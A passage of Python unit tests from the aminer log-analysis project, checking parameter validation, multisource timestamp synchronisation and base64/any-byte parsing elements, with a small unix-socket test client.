fdme, [], [self.stream_printer_event_handler], [], json_format=True, xml_format=True) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time="default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=b"Default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=None) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=123) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=123.3) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=[b"default"]) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time={"id": "Default"}) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=set()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning="default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=b"Default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=None) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=123) 
        # --- tail of the preceding test method (its start is not visible here):
        # continuous_timestamp_missing_warning must be a bool; every other type is rejected with TypeError.
        self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=123.3)
        self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=[b"default"])
        self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning={"id": "Default"})
        self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=())
        self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=set())
        # Positive cases: an empty handler list and a None parsing model are accepted by the constructor.
        SimpleByteStreamLineAtomizerFactory(fdme, [], [], ["path"])
        SimpleByteStreamLineAtomizerFactory(fdme, None, [], [])


if __name__ == "__main__":
    unittest.main()


# ==== file: aecid-testsuite/unit/input/SimpleMultisourceAtomSyncTest.py ====
import unittest
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector
from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from time import time, sleep
from unit.TestBase import TestBase, DummyMatchContext
from datetime import datetime


class SimpleMultisourceAtomSyncTest(TestBase):
    """Unittests for the SimpleMultisourceAtomSync.

    The sync component buffers atoms per source and only forwards them once
    every source has either delivered an atom with a later timestamp or has been
    idle for sync_wait_time seconds. Because of that the test below relies on
    real wall-clock sleeps (>= 3 s each), so it is slow and, under heavy load,
    may become timing-sensitive.
    """

    def test1receive_atom(self):
        """Test if the SimpleMultisourceAtomSync works in different scenarios and orders the data correctly.

        Scenarios covered (each one rebuilds the SimpleMultisourceAtomSync):
          1. two atoms from one source, already sorted;
          2. an atom without a timestamp;
          3. two atoms from one source arriving out of order;
          4. a source that becomes idle and expires.
        Output of the NewMatchPathDetector handlers is captured via self.output_stream.
        """
        __expected_string = '%s New path(s) detected\n%s: "None" (%d lines)\n %s\n\n'
        __expected_string_no_date = 'New path(s) detected\n%s: "None" (%d lines)\n %s\n\n'
        calculation = b'256 * 2 = 512'
        datetime_format_string = '%Y-%m-%d %H:%M:%S'
        match_path = "['match/a1']"

        # already sorted log atoms
        sync_wait_time = 3
        abdme = AnyByteDataModelElement("a1")
        nmpd1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False, output_logline=False)
        nmpd2 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False, output_logline=False)
        smas = SimpleMultisourceAtomSync([nmpd1, nmpd2], sync_wait_time)
        t = time()
        match_element = abdme.get_match_element("match", DummyMatchContext(calculation))
        log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t, nmpd1)
        log_atom2 = LogAtom(match_element.match_object, ParserMatch(match_element), t + 1, nmpd1)
        # First atom is buffered, not forwarded, until the wait time has elapsed.
        self.assertFalse(smas.receive_atom(log_atom1))
        sleep(sync_wait_time + 1)
        # not of the same source, thus must not be accepted.
        # NOTE(review): both log_atom1 and log_atom2 are created with nmpd1 as their source, so the
        # comment above looks stale; the rejection here presumably happens because log_atom1 is
        # still pending and log_atom2 has a later timestamp — confirm against SimpleMultisourceAtomSync.
        self.assertFalse(smas.receive_atom(log_atom2))
        self.assertTrue(smas.receive_atom(log_atom1))
        # logAtom1 is handled now, so logAtom2 is accepted.
        self.reset_output_stream()
        self.assertTrue(smas.receive_atom(log_atom2))
        # Two detectors are attached, so the same "new path" report is expected twice.
        self.assertEqual(self.output_stream.getvalue(), __expected_string % (
            datetime.fromtimestamp(t + 1).strftime(datetime_format_string), nmpd1.__class__.__name__, 1, match_path) + __expected_string % (
            datetime.fromtimestamp(t + 1).strftime(datetime_format_string), nmpd1.__class__.__name__, 1, match_path))

        # In this test case a LogAtom with no timestamp is received by the class.
        # An atom without a timestamp cannot be ordered and is forwarded immediately.
        self.reset_output_stream()
        smas = SimpleMultisourceAtomSync([nmpd1], sync_wait_time)
        log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), None, nmpd1)
        self.assertTrue(smas.receive_atom(log_atom1))
        self.assertEqual(self.output_stream.getvalue(), __expected_string_no_date % (nmpd1.__class__.__name__, 1, match_path))

        # In this test case multiple, UNSORTED LogAtoms of different sources are received by the class.
        # NOTE(review): despite the comment, both atoms again carry nmpd1 as source; only the timestamps differ.
        smas = SimpleMultisourceAtomSync([nmpd1, nmpd2], sync_wait_time)
        t = time()
        log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t, nmpd1)
        log_atom2 = LogAtom(match_element.match_object, ParserMatch(match_element), t - 1, nmpd1)
        self.assertFalse(smas.receive_atom(log_atom1))
        sleep(sync_wait_time)
        # unsorted, should be accepted
        self.reset_output_stream()
        self.assertTrue(smas.receive_atom(log_atom2))
        self.assertTrue(smas.receive_atom(log_atom1))
        # Expected order of the four reports: the older atom (t - 1) twice, then the newer one (t) twice.
        self.assertEqual(self.output_stream.getvalue(), __expected_string % (
            datetime.fromtimestamp(t - 1).strftime(datetime_format_string), nmpd1.__class__.__name__, 1, match_path) + __expected_string % (
            datetime.fromtimestamp(t - 1).strftime(datetime_format_string), nmpd1.__class__.__name__, 1, match_path) + __expected_string % (
            datetime.fromtimestamp(t).strftime(datetime_format_string), nmpd1.__class__.__name__, 1, match_path) + __expected_string % (
            datetime.fromtimestamp(t).strftime(datetime_format_string), nmpd1.__class__.__name__, 1, match_path))

        # In this test case a source becomes idle and expires.
        # Only nmpd1 is registered as a handler; nmpd2 is used purely as a second *source* identity.
        smas = SimpleMultisourceAtomSync([nmpd1], sync_wait_time)
        t = time()
        log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t, nmpd1)
        log_atom2 = LogAtom(match_element.match_object, ParserMatch(match_element), t, nmpd2)
        self.assertFalse(smas.receive_atom(log_atom1))
        self.assertFalse(smas.receive_atom(log_atom2))
        sleep(sync_wait_time + 1)
        self.assertTrue(smas.receive_atom(log_atom1))
        # log_atom1 is handled now, so new_match_path_detector1 should be deleted after waiting the sync_wait_time.
        self.assertFalse(smas.receive_atom(log_atom2))
        sleep(sync_wait_time + 1)
        self.assertFalse(smas.receive_atom(log_atom2))
        # sources_dict maps each source to [last forwarded timestamp, pending atom or None].
        self.assertEqual(smas.sources_dict, {nmpd1: [log_atom1.get_timestamp(), None], nmpd2: [log_atom2.get_timestamp(), log_atom2]})
        self.assertTrue(smas.receive_atom(log_atom1))
        self.assertTrue(smas.receive_atom(log_atom1))
        sleep(sync_wait_time + 1)
        self.assertTrue(smas.receive_atom(log_atom1))
        self.assertEqual(smas.sources_dict, {nmpd1: [log_atom1.get_timestamp(), None], nmpd2: [log_atom2.get_timestamp(), log_atom2]})
        # A newer atom (t + 1) from nmpd1 is buffered because nmpd2 still has an older pending atom.
        log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t + 1, nmpd1)
        self.assertFalse(smas.receive_atom(log_atom1))
        self.assertEqual(smas.sources_dict, {nmpd1: [log_atom1.get_timestamp() - 1, log_atom1], nmpd2: [log_atom2.get_timestamp(), log_atom2]})
        # An atom older than everything pending (t - 1) is passed through directly.
        log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t - 1, nmpd1)
        self.assertTrue(smas.receive_atom(log_atom1))

    def test2validate_parameters(self):
        """Test all initialization parameters for the atomizer.
        Input parameters must be validated in the class.

        Expected contract: the first argument must be a non-empty list of atom handlers
        (even an empty list raises TypeError here), the second a numeric sync_wait_time
        (int or float accepted, bool and everything else rejected with TypeError).
        """
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False, output_logline=False)
        # atom_handler_list: non-list values and an empty list are rejected.
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, "default", 3)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, b"Default", 3)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, None, 3)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, True, 3)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, 123, 3)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, 123.3, 3)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, ["default"], 3)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, {"id": "Default"}, 3)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, [], 3)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, (), 3)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, set(), 3)
        # sync_wait_time: only int/float are accepted (bool is explicitly rejected).
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], "default")
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], b"Default",)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], None)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], True)
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], ["default"])
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], {"id": "Default"})
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], [])
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], ())
        self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], set())
        SimpleMultisourceAtomSync([nmpd], 123)
        SimpleMultisourceAtomSync([nmpd], 123.3)


if __name__ == "__main__":
    unittest.main()


# ==== file: aecid-testsuite/unit/input/__init__.py (empty) ====

# ==== file: aecid-testsuite/unit/input/client.py (continues on the next page line) ====
from
time import sleep
import socket

# Helper client for a unix-socket test: waits briefly for the server side to bind,
# then sends one fixed payload and disconnects.
# NOTE(review): the socket path is a fixed, predictable name under the shared /tmp
# directory. Any local user could pre-create that path and capture or spoof the
# payload; this is tolerable only in an isolated test environment, never as a
# pattern for production code.
sock_name = '/tmp/test5unixSocket.sock'
sleep(0.5)  # give the listening side time to bind before connecting
client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client.connect(sock_name)
client.send(b'data')
client.close()


# ==== file: aecid-testsuite/unit/parsing/AnyByteDataModelElementTest.py ====
import unittest
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext


class AnyByteDataModelElementTest(TestBase):
    """Unittests for the AnyByteDataModelElement.

    AnyByteDataModelElement consumes every remaining byte of the match context;
    the tests check the full-match case, the empty-input case and the input
    validation of the constructor and of get_match_element.
    """

    id_ = "any"
    path = "path"

    def test1get_match_element_valid_match(self):
        """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters."""
        data = b"abcdefghijklmnopqrstuvwxyz.!?"
        match_context = DummyMatchContext(data)
        any_dme = AnyByteDataModelElement(self.id_)
        match_element = any_dme.get_match_element(self.path, match_context)
        # match_string and match_object are both the complete input; no children are produced.
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, None)

    def test2get_match_element_no_match(self):
        """Parse not matching substring from MatchContext and check if the MatchContext was not changed."""
        # Empty input is the only way this element can fail to match.
        data = b""
        match_context = DummyMatchContext(data)
        any_dme = AnyByteDataModelElement(self.id_)
        match_element = any_dme.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

    def test3element_id_input_validation(self):
        """Check if element_id is validated.

        element_id must be a non-empty str: an empty string raises ValueError, any
        non-str type raises TypeError.
        """
        self.assertRaises(ValueError, AnyByteDataModelElement, "")  # empty element_id
        self.assertRaises(TypeError, AnyByteDataModelElement, None)  # None element_id
        self.assertRaises(TypeError, AnyByteDataModelElement, b"path")  # bytes element_id is not allowed
        self.assertRaises(TypeError, AnyByteDataModelElement, True)  # boolean element_id is not allowed
        self.assertRaises(TypeError, AnyByteDataModelElement, 123)  # integer element_id is not allowed
        self.assertRaises(TypeError, AnyByteDataModelElement, 123.22)  # float element_id is not allowed
        self.assertRaises(TypeError, AnyByteDataModelElement, {"id": "path"})  # dict element_id is not allowed
        self.assertRaises(TypeError, AnyByteDataModelElement, ["path"])  # list element_id is not allowed
        self.assertRaises(TypeError, AnyByteDataModelElement, [])  # empty list element_id is not allowed
        self.assertRaises(TypeError, AnyByteDataModelElement, ()) # empty tuple element_id is not allowed
        self.assertRaises(TypeError, AnyByteDataModelElement, set())  # empty set element_id is not allowed

    def test4get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.

        Both the real MatchContext and the test DummyMatchContext are accepted; anything
        else fails with AttributeError (the element accesses context attributes directly
        rather than checking the type up front).
        """
        model_element = AnyByteDataModelElement(self.id_)
        data = b"abcdefghijklmnopqrstuvwxyz.!?"
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, True)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, None)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, [])
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)})
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, set())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, ())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element)


if __name__ == "__main__":
    unittest.main()


# ==== file: aecid-testsuite/unit/parsing/Base64StringModelElementTest.py (continues on the next page line) ====
import unittest
from aminer.parsing.Base64StringModelElement import Base64StringModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext


class Base64StringModelElementTest(TestBase):
    """Unittests for the Base64StringModelElement.

    The element consumes the longest base64-alphabet prefix of the input (whole
    4-character groups only), decodes it, and — where the decoded bytes are not
    valid UTF-8 — keeps the encoded form as match_object instead.
    """

    id_ = "base64"
    path = "path"

    def test1get_match_element_valid_match_string_with_padding(self):
        """Parse matching substring with padding from MatchContext and check if the MatchContext was
        updated with all base64 data."""
        # Two padding characters: the decoded text has 34 bytes (34 % 3 == 1).
        string = b"This is some string to be encoded."
        base64_string = b"VGhpcyBpcyBzb21lIHN0cmluZyB0byBiZSBlbmNvZGVkLg=="
        match_context = DummyMatchContext(base64_string)
        base64_dme = Base64StringModelElement(self.id_)
        match_element = base64_dme.get_match_element(self.path, match_context)
        # match_string is the raw base64 input, match_object the decoded text.
        self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, string, None)

    def test2get_match_element_valid_match_string_with_one_byte_padding(self):
        """Parse matching substring with padding from MatchContext and check if the MatchContext was updated with all base64 data."""
        # One padding character: 26 decoded bytes (26 % 3 == 2).
        string = b"This is some encoded strin"
        base64_string = b"VGhpcyBpcyBzb21lIGVuY29kZWQgc3RyaW4="
        match_context = DummyMatchContext(base64_string)
        base64_dme = Base64StringModelElement(self.id_)
        match_element = base64_dme.get_match_element(self.path, match_context)
        self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, string, None)

    def test3get_match_element_valid_match_string_without_padding(self):
        """Parse matching substring without padding from MatchContext and check if the MatchContext was updated with all base64 data."""
        # Length is a multiple of 3, so the encoding needs no '=' padding at all.
        string = b"This is some string to be encoded without the padding character =."
        base64_string = b"VGhpcyBpcyBzb21lIHN0cmluZyB0byBiZSBlbmNvZGVkIHdpdGhvdXQgdGhlIHBhZGRpbmcgY2hhcmFjdGVyID0u"
        match_context = DummyMatchContext(base64_string)
        base64_dme = Base64StringModelElement(self.id_)
        match_element = base64_dme.get_match_element(self.path, match_context)
        self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, string, None)

    def test4get_match_element_valid_match_string_without_exact_length(self):
        """Parse matching substring without exact length (divisible by 4) and check if the MatchContext was updated with all base64 data."""
        # The trailing '=' was dropped, leaving 35 characters. The element only consumes whole
        # 4-character groups, so 32 characters (24 decoded bytes) are matched: the 3 dangling
        # characters stay in the context and the last 2 bytes of `string` are not decoded.
        string = b"This is some encoded strin"
        base64_string = b"VGhpcyBpcyBzb21lIGVuY29kZWQgc3RyaW4"
        match_context = DummyMatchContext(base64_string)
        base64_dme = Base64StringModelElement(self.id_)
        match_element = base64_dme.get_match_element(self.path, match_context)
        self.compare_match_results(
            base64_string, match_element, match_context, self.id_, self.path, base64_string[:-(len(base64_string) % 4)], string[:-2], None)

    def test5get_match_element_valid_match_string_with_partial_length(self):
        """Parse matching substring out of the MatchContext and check if the MatchContext was updated with all base64 data."""
        # The base64 value is followed by non-base64 data; only the prefix up to and including
        # the padding must be consumed, the newline and the rest stay in the context.
        string = b"This is some encoded strin"
        base64_string = b"VGhpcyBpcyBzb21lIGVuY29kZWQgc3RyaW4="
        data = base64_string + b"\nContent: Public Key"
        match_context = DummyMatchContext(data)
        base64_dme = Base64StringModelElement(self.id_)
        match_element = base64_dme.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, base64_string, string, None)

    def test6get_match_element_no_match(self):
        """Parse not matching substring from MatchContext and check if the MatchContext was not changed."""
        base64_dme = Base64StringModelElement(self.id_)
        # A leading character outside the base64 alphabet yields no match at all.
        data = b"!Hello World"
        match_context = DummyMatchContext(data)
        match_element = base64_dme.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

        # Same for leading non-ASCII bytes: the element must not attempt to decode them.
        data = b"\x90\x90Hello World"
        match_context = DummyMatchContext(data)
        match_element = base64_dme.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

    def test7get_match_element_unicode_exception(self):
        """Parse a Base64 string which can not be decoded as UTF-8, so it has to be returned base64 encoded."""
        # ² encoded with ISO-8859-1
        # "sg==" decodes to the single byte 0xB2, which is not valid UTF-8 on its own, so the
        # element falls back to returning the still-encoded input as match_object.
        base64_string = b"sg=="
        match_context = DummyMatchContext(base64_string)
        base64_dme = Base64StringModelElement(self.id_)
        match_element = base64_dme.get_match_element(self.path, match_context)
        self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, base64_string, None)

    def test8element_id_input_validation(self):
        """Check if element_id is validated.

        element_id must be a non-empty str: an empty string raises ValueError, any
        non-str type raises TypeError.
        """
        self.assertRaises(ValueError, Base64StringModelElement, "")  # empty element_id
        self.assertRaises(TypeError, Base64StringModelElement, None)  # None element_id
        self.assertRaises(TypeError, Base64StringModelElement, b"path")  # bytes element_id is not allowed
        self.assertRaises(TypeError, Base64StringModelElement, True)  # boolean element_id is not allowed
        self.assertRaises(TypeError, Base64StringModelElement, 123)  # integer element_id is not allowed
        self.assertRaises(TypeError, Base64StringModelElement, 123.22)  # float element_id is not allowed
        self.assertRaises(TypeError, Base64StringModelElement, {"id": "path"})  # dict element_id is not allowed
        self.assertRaises(TypeError, Base64StringModelElement, ["path"])  # list element_id is not allowed
        self.assertRaises(TypeError, Base64StringModelElement, [])  # empty list element_id is not allowed
        self.assertRaises(TypeError, Base64StringModelElement, ())  # empty tuple element_id is not allowed
        self.assertRaises(TypeError, Base64StringModelElement, set())  # empty set element_id is not allowed

    def test9get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.

        Both the real MatchContext and the test DummyMatchContext are accepted; anything
        else fails with AttributeError (the element accesses context attributes directly
        rather than checking the type up front).
        """
        model_element = Base64StringModelElement(self.id_)
        data = b"VGhpcyBpcyBzb21lIHN0cmluZyB0byBiZSBlbmNvZGVkLg=="
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, True)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, None)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, [])
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)})
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, set())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, ())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element)

    def test10performance(self):
        """Test the performance of the implementation. Comment this test out in normal cases.

        The body only builds timeit setup strings; the actual timing loop further down
        is commented out, so this test does no work when the suite runs. The setup
        strings below are source code executed by timeit, not data for the element.
        """
        import_setup = """
import copy
from unit.TestBase import DummyMatchContext
from aminer.parsing.Base64StringModelElement import Base64StringModelElement
times = 100000
"""
        string100_setup = """
# b"ASCII stands for American Standard Code for Information Interchange. Computers can only understand."
base64_string = b"QVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhb" \ b"iBvbmx5IHVuZGVyc3RhbmQu" """ string4096_setup = """ # b"ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII code " \ # b"is the numerical representation of a character such as "a" or "@" or an action of some sort. ASCII was developed a long time " \ # b"ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII character table and " \ # b"this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and " \ # b"so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they " \ # b"want "plain" text with no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. " \ # b"This is usually so they can easily import the file into their own applications without issues. Notepad.exe creates ASCII " \ # b"text, or in MS Word you can save a file as "text only"ASCII stands for American Standard Code for Information Interchange. " \ # b"Computers can only understand numbers, so an ASCII code is the numerical representation of a character such as "a" or "@" " \ # b"or an action of some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their " \ # b"original purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-printing characters. " \ # b"ASCII was actually designed for use with teletypes and so the descriptions are somewhat obscure. If someone says they want " \ # b"your CV however in ASCII format, all this means is they want "plain" text with no formatting such as tabs, bold or " \ # b"underscoring - the raw format that any computer can understand. 
This is usually so they can easily import the file into " \ # b"their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you can save a file as "text only"" \ # b"ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII " \ # b"code is the numerical representation of a character such as "a" or "@" or an action of some sort. ASCII was developed a " \ # b"long time ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII " \ # b"character table and this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for " \ # b"use with teletypes and so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, " \ # b"all this means is they want "plain" text with no formatting such as tabs, bold or underscoring - the raw format that any " \ # b"computer can understand. This is usually so they can easily import the file into their own applications without issues. " \ # b"Notepad.exe creates ASCII text, or in MS Word you can save a file as "text only"ASCII stands for American Standard Code for " \ # b"Information Interchange. Computers can only understand numbers, so an ASCII code is the numerical representation of a " \ # b"character such as "a" or "@" or an action of some sort. ASCII was developed a long time ago and now the non-printing " \ # b"characters are rarely used for their original purpose. Below is the ASCII character table and this includes descriptions " \ # b"of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and so the descriptions are " \ # b"somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they want "plain" text with " \ # b"no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. 
This is usually so they " \ # b"can easily import the file into their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you " \ # b"can save a file as "text only"ASCII stands for American Standard Code for Information Interchange. Computers can only " \ # b"understand numbers, so an ASCII code is the numerical representation of a character such as "a" or "@" or an action of " \ # b"some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their original " \ # b"purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-prin" base64_string = b"QVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHV" \ b"uZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYX" \ b"MgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub" \ b"24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFy" \ b"YWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUk" \ b"gd2FzIGFjdHVhbGx5IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZWxldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlwdGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cm" \ b"UuIElmIHNvbWVvbmUgc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWxsIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50I" \ b"CdwbGFpbicgdGV4dCB3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBhcyB0YWJzLCBib2xkIG9yIHVuZGVyc2NvcmluZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQg" \ b"YW55IGNvbXB1dGVyIGNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHVzdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5IGltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWl" \ b"yIG93biBhcHBsaWNhdGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdGVwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIH" \ 
